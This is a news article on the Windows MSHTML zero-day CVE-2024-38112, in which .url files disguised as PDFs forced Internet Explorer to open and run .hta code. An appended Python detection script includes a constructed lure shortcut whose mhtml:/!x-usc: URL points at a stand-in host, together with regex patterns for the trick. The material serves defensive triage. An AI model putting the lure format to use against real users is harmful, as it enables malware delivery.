Threat actors exploited Windows 0-day for more than a year before Microsoft fixed it


Threat actors carried out zero-day attacks that targeted Windows users with malware for more than a year before Microsoft fixed the vulnerability that made them possible, researchers said Tuesday.

The vulnerability, present in both Windows 10 and 11, causes devices to open Internet Explorer, the legacy browser that Microsoft retired in 2022 after its aging codebase made it increasingly susceptible to exploits. Following that decision, Windows made it difficult, if not impossible, for normal actions to open the browser, which was first introduced in the mid-1990s.

Malicious code that exploits the vulnerability goes back to at least January 2023 and was still circulating as recently as May of this year, according to the researchers who discovered the vulnerability and reported it to Microsoft. The company fixed the vulnerability, tracked as CVE-2024-38112, on Tuesday as part of its monthly patch release program. The vulnerability, which resided in the Windows MSHTML engine, carries a severity rating of 7.5 out of 10.

Researchers at security firm Check Point said the attack code used “novel (or previously unknown) tricks to lure Windows users for remote code execution.” One link that appeared to open a PDF file appended a .url extension to the end of the file name, for example Books_A0UJKO.pdf.url, which was found in one of the malicious code samples.

When viewed in Windows, the file displayed an icon indicating that it was a PDF rather than a .url file. Such files are designed to open an application specified in a link.

The file referenced msedge.exe, the executable that runs Edge. The link, however, was prefixed with two attributes, mhtml: and !x-usc:, an “old trick” that threat actors have used for years to fool Windows. It also contained a link to a malicious website. When clicked, the .url file disguised as a PDF opened the site not in Edge but in Internet Explorer.

“From there (with the webpage opened in IE), the attacker can do many bad things because IE is insecure and outdated,” wrote Haifei Li, the Check Point researcher who discovered the vulnerability. “For example, if the attacker has an IE zero-day exploit, which is much easier to find compared to Chrome/Edge, the attacker could attack the victim to gain remote code execution immediately. However, in the samples we analyzed, the threat actors didn’t use any IE remote code execution exploit. Instead, they used another trick in IE, which was probably not known to the public previously, to the best of our knowledge, to trick the victim into executing code remotely.”

IE would then present the user with a dialog box asking whether they wanted to open the file disguised as a PDF. If the user clicked “open,” Windows would display a brief second dialog with a vague message saying that continuing would open content on the Windows device. If the user clicked “allow,” IE would load a file ending in .hta, an extension that causes Windows to open the file in Internet Explorer and execute the code embedded in it.

“To summarize the attacks from the exploitation perspective: the first technique used in these campaigns is the ‘mhtml’ trick, which allows the attacker to call IE instead of the more secure Chrome/Edge,” Li wrote. “The second technique is an IE trick to make the victim believe they are opening a PDF file, while in fact they are downloading and executing a dangerous .hta application. The overall goal of these attacks is to make the victims believe they are opening a PDF file, and it is made possible by using these two tricks.”

Check Point’s post includes cryptographic hashes for six malicious .url files used in the campaign. Windows users can use the hashes to check whether they have been targeted.
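As an added example (not code from this article or from Check Point’s post), the following Python script shows how the lure described above can be triaged offline: it parses the INI-style .url file, flags the mhtml: prefix and the !x-usc: redirect that force the target into Internet Explorer, flags the document.pdf.url double extension and a borrowed browser icon, and compares a file’s SHA-256 against a supplied indicator list such as the hashes Check Point published. The shortcut contents, the host lure.example and the icon path are constructed assumptions for illustration, not the campaign’s real indicators.

```python
"""Triage Internet Shortcut (.url) files for the mhtml:/!x-usc: lure described above."""
import configparser
import hashlib
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample contents. The host lure.example, the icon path and the
# document name are assumptions for illustration, not the campaign's real IOCs.
LURE_URL_FILE = """[InternetShortcut]
URL=mhtml:http://lure.example/Books_A0UJKO.pdf!x-usc:http://lure.example/Books_A0UJKO.pdf
IconFile=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe
IconIndex=13
ShowCommand=7
"""

BENIGN_URL_FILE = """[InternetShortcut]
URL=https://docs.example.com/manual/
IconIndex=0
"""

MHTML_PREFIX = re.compile(r"^\s*mhtml:", re.IGNORECASE)
X_USC_MARKER = re.compile(r"!x-usc:", re.IGNORECASE)
DOUBLE_EXT = re.compile(r"\.(pdf|docx?|xlsx?|pptx?)\.url$", re.IGNORECASE)
HTA_TARGET = re.compile(r"\.hta(\?|#|$)", re.IGNORECASE)


@dataclass
class Verdict:
    suspicious: bool = False
    reasons: list = field(default_factory=list)
    target: Optional[str] = None  # site that IE, not Edge, would be sent to


def parse_internet_shortcut(text: str) -> dict:
    """Parse the INI-style [InternetShortcut] section into lower-cased keys."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(text)
    if not cp.has_section("InternetShortcut"):
        raise ValueError("no [InternetShortcut] section: not a .url file")
    return {k.lower(): v.strip() for k, v in cp.items("InternetShortcut")}


def assess_url_file(filename: str, text: str) -> Verdict:
    """Flag the IE-forcing trick plus the double-extension disguise."""
    fields = parse_internet_shortcut(text)
    url = fields.get("url", "")
    v = Verdict()

    # Trick 1: an mhtml: URL is handed to Internet Explorer instead of the
    # default browser; the !x-usc: part names the site IE is then sent to.
    if MHTML_PREFIX.match(url):
        v.reasons.append("URL= starts with mhtml: (opens in Internet Explorer)")
    if X_USC_MARKER.search(url):
        v.target = X_USC_MARKER.split(url, maxsplit=1)[1]
        v.reasons.append("URL= contains !x-usc: redirect to " + v.target)

    # The .hta stage arrives from the server later, but a shortcut that points
    # straight at an HTML Application is worth flagging on its own.
    if v.target and HTA_TARGET.search(v.target):
        v.reasons.append("redirect target is an HTML Application (.hta)")

    # Disguise: 'Books_A0UJKO.pdf.url' displays as 'Books_A0UJKO.pdf' when
    # Windows hides known extensions, and the icon is borrowed from a browser.
    if DOUBLE_EXT.search(filename):
        v.reasons.append("double extension hides .url behind a document name")
    if re.search(r"(?i)(msedge|iexplore)\.exe$", fields.get("iconfile", "")):
        v.reasons.append("IconFile borrows a browser executable's icon (weak indicator)")

    v.suspicious = bool(v.reasons)
    return v


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def matches_known_hash(data: bytes, known_hashes) -> bool:
    """Compare a file's SHA-256 with a published indicator list (e.g. Check Point's)."""
    return sha256_hex(data) in {h.lower() for h in known_hashes}


if __name__ == "__main__":
    for name, body in (("Books_A0UJKO.pdf.url", LURE_URL_FILE), ("manual.url", BENIGN_URL_FILE)):
        verdict = assess_url_file(name, body)
        print(name, "SUSPICIOUS" if verdict.suspicious else "clean")
        for reason in verdict.reasons:
            print("  -", reason)
```

The mhtml: and !x-usc: checks are the high-confidence signals; the icon check is deliberately reported as weak, since legitimate shortcuts can borrow an icon from a browser binary. To use the hash check, pass the SHA-256 values from Check Point’s post as the known_hashes set and feed it the raw bytes of any .url file found in Downloads or mail attachments.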
